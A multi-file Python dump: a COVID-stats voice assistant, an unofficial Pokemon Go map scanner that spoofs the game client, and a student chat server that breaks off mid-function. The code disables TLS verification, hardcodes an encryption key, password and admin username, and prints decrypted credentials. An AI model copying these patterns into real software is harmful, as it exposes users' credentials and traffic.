re.compile("[\w\s]+ deaths [\w\s]+"): lambda country: data.get_country_data(country)['total_deaths'],
}
UPDATE_COMMAND = "update"
while True:
print("Listening...")
speak("listening")
text = get_audio()
print("prompt:",text)
result = None
for pattern, func in COUNTRY_PATTERNS.items():
if pattern.match(text):
words = set(text.split(" "))
for country in country_list:
if country in words:
result = func(country)
break
for pattern, func in TOTAL_PATTERNS.items():
if pattern.match(text):
result = func()
break
if text == UPDATE_COMMAND:
result = "Data is being updated. This may take a moment!"
data.update_data()
if result:
print(result)
speak(result)
if text.find(END_PHRASE) != -1:
print("Exit")
break
main()
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#test223
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
f = open('test.txt', 'a')
#f.writelines("DayOfWeek,Month,DayOfMonth,Time,Year,TimeLeft,Long,Lat,Name;")
timestamp = time.clock()
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
#hier
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only,f,time.time())
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only, file, timestamp):
print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
#print pokename
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId;
if hash not in seen.keys() or (seen[hash].TimeTillHiddenMs <= wild.TimeTillHiddenMs):
visible.append(wild)
seen[hash] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
print "---"
print time.time()
print disappear_timestamp
#timenow = str(time.ctime(disappear_timestamp-time.time()))
timeleft = disappear_timestamp-timestamp
timeleft = round(timeleft,0)
timenow = time.ctime(timestamp).split(" ")
file.writelines(str(timenow[0]) + "," + str(timenow[1]) + "," + str(timenow[2]) + "," + str(timenow[3]) + "," + str(timenow[4])+ "," + str(timeleft) + "," + str(disappear_timestamp) + "," + str(poke.Latitude) + "," + str(poke.Longitude) + "," + pokename.encode("utf-8") + ";\n")
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
print pokemon
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
ChatApplication_server.py
|
# -*- coding: utf-8 -*-
"""
Chat Room for Client Server Architecture.
University of the West of Scotland.
Author: Guillermo Siesto Sanchez B00334584
e-Mail: b00334684 at studentmail.uws.ac.uk
Date: 2018
Description: The purpose of this coursework is to develop a distributed chat
system without using any thrid party networking library.
===========
S E R V E R
===========
"""
##
# Imports
##
import datetime
import logging # Generate a log file to record all the changes made
import socket
from sys import argv, stdout
import os # For exiting of every thread
import re
import threading # Threading
from simplecrypt import encrypt, decrypt # https://github.com/andrewcooke/simple-crypt
##
# Configuration of the log file
##
logging.basicConfig(level=logging.INFO,
filename='log/ChatApplication_server.log',
format='[%(levelname)s] %(asctime)s %(message)s', )
##
# Inicialization
##
host = '127.0.0.1'
buffer_size = 12800
n_connection = 100 # Number of possible connection
ftp_password = "ftpadmin"
active_connections = [] # User connected. [[username, grant, socket], ...
inactive_connections = [] # User inactive. [[username, grant, socket], ...
kick_connections = [] # Kicked users. [[username, grant, socket], ...
##
# lock
lock = threading.RLock()
def connect_client(client_sock, client_ip_and_port):
"""
First iteration between the client and the server.
The server will ask for the credentials of the user identifiying if he
needs to be registered or logged.
@param client_sock Raw socket introduced as a parameter.
@param client_ip_and_port A list of two slots with the ip and the port
of the client.
@exception if the conecction with the socket is interrupted.
"""
client_sock.sendall('Connecting...\n')
print '] A client [{}] is trying to connect...'.format(client_ip_and_port)
client_ip = client_ip_and_port[0]
credential_response = ask_credentials(client_sock)
logging.info("User Login Info = {}".format(credential_response))
user_name = credential_response[1][1]
if (credential_response[0] == 'y'): # REGISTER
if (credential_response[1][0]):
print '] USER:%s with IP:%s has join the room for the first time' % (credential_response[1][1], client_ip)
client_sock.sendall('<Server>: You have entered the room')
client_sock.sendall('================== < > ==================')
# Add to the active user list
user_data = [user_name, 1, client_sock]
with lock:
active_connections.append(user_data)
# Loop
open_connection(client_sock, user_name, 'l')
else:
print "ERROR 1 -> The username CAN'T exist in the database, try again"
client_sock.sendall("<Server>: ERROR 1 -> The username CAN'T exist in the database, try again")
connect_client(client_sock, client_ip_and_port)
elif (credential_response[0] == 'n'): # LOGIN
if (credential_response[1][0]):
print '] USER:%s with IP:%s has join the room' %(credential_response[1][1], client_ip)
client_sock.sendall('<Server>: Welcome back {} \n'.format(credential_response[1][1]))
client_sock.sendall('================== < > ==================')
# Add to the active user list
user_data = [user_name, get_user_grant(user_name), client_sock]
with lock:
active_connections.append(user_data)
# Loop
open_connection(client_sock, user_name, 'r')
else:
print "ERROR 2 -> The credentials are incorrect"
client_sock.sendall("<Server>: ERROR 2 -> The credentials are incorrect")
connect_client(client_sock, client_ip_and_port)
else:
print '] USER:%s with IP:%s has problems trying to connect. Please try again' %(credential_response[1][1], client_ip)
client_sock.sendall('<Server>: You had problems to connect. Please try again')
connect_client(client_sock, client_ip_and_port)
##
# Semi-infinite loop with the soket waiting to comunicate client and server
def open_connection(client_sock, user_name, direction):
try:
currentDT = datetime.datetime.now()
for x in range(len(active_connections)):
active_connections[x][2].sendall(currentDT.strftime("<\ %I:%M %p | ") + ' USER:%s has join the room />' %(user_name))
while (get_socket_index(client_sock) != -1): # While exists
message = client_sock.recv(buffer_size)
msg = message
check_message(client_sock, user_name, msg)
except ():
if direction == 'r':
print "] Exception when receiving on REGISTER"
else:
print "] Exception when reciving on LOGIN"
client_exit(client_sock)
print "\nSever down ==================\n"
os._exit(1)
##
# It is dedicated of asking the credential by command line to the user.
#
# @param client_sock Raw socket introduced as a parameter
#
# @return a list of list with the information:
# [0] 'y' user wants to register / 'n' wants to login
# [1]
# [1][0] return of the method call create_user(client_sock)
# [1][1] return of the method call login_user(client_sock)
def ask_credentials(client_sock):
try:
client_sock.sendall('<Server>: Do you want to create a new user? [y/n]')
response = client_sock.recv(buffer_size)
if (response == 'y'): # YES
return ('y', create_user(client_sock))
elif (response == 'n'): # NO
return ('n', login_user(client_sock))
else:
# Default
client_sock.sendall('<Server>: Error, you must respond with "y" saying yes or "n" saying no')
ask_credentials(client_sock)
except ():
print "] Exception while asking credentials"
client_exit(client_sock)
print "\nSever down ==================\n"
os._exit(1)
##
# Create a user saving it in a text file. The server will ask for the
# credentials through the command line
#
# @param client_sock Raw socket introduced as a parameter
#
# @return A list with two elements:
# [0] Boolean telling if was possible creating an username
# [1] String with the username
def create_user(client_sock):
client_sock.sendall('<Server>: (1/3) Write your user name:')
user_name = client_sock.recv(buffer_size)
client_sock.sendall('<Server>: (2/3) Write your password:')
user_password = client_sock.recv(buffer_size)
client_sock.sendall('<Server>: (3/3) Write your password:')
user_password_2 = client_sock.recv(buffer_size)
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close()
users = []
i = 0
while (i < len(database_doc_list)):
sublist = re.split('[;#]', database_doc_list[i])
users.append(sublist[0])
i = i + 1
answer = (False, user_name)
if (not(user_name in users)):
if ((user_password == user_password_2)): # 2 passwords math?
with open('database/users_credentials.enc', 'a') as aDoc:
if (user_name == "Guille"): # Default admin
ciphertext = encrypt_txt(user_name + ';' + user_password + '#' + format(0))
else:
ciphertext = encrypt_txt(user_name + ';' + user_password + '#' + format(1))
aDoc.write(ciphertext + "+$&$&+")
aDoc.close()
print '] %s Has join the party.\n' % user_name
answer = (True, user_name)
else:
client_sock.sendall('<Server>: The password are not the same, please try again')
answer = (False, user_name)
else:
client_sock.sendall('<Server>: You must choose another username')
answer = (False, user_name)
return answer
##
# Encrypt txt
def encrypt_txt(p_text):
print ("Encrypting [0%]")
e_txt = encrypt("GSS", p_text.encode('utf8'))
print ("Encrypting [100%]")
return e_txt
##
# Decrypt list
def decrypt_list(p_list):
print "Encrypted list: " + format(p_list)
print ("Decrypting [0%]")
d_list = []
i = 0
while (i < len(p_list) and p_list[i] != ''):
if (p_list[i] != '\n' or p_list[i] != ''): # If it's not an empty line in the doc
print "Let's append: " + format(p_list[i])
print "No encrypt: " + format(decrypt("GSS", p_list[i]))
d_list.append(decrypt("GSS", p_list[i]))
i = i + 1
print ("Decrypting [100%]")
print "LISTA:" + format(d_list)
return d_list
##
# Check is the password introduced as parameter math with the user and
# password in the database doc
def check_password(user_name, password):
answer = False
salir = False
with open('database/users_credentials.enc', 'r') as rDoc:
database_doc_list = decrypt_list(rDoc.read().split("+$&$&+"))
rDoc.close() # Close document
# Eliminate '\n' from our list
#database_doc_list = map(lambda each: each.strip("\n"), database_doc_list)
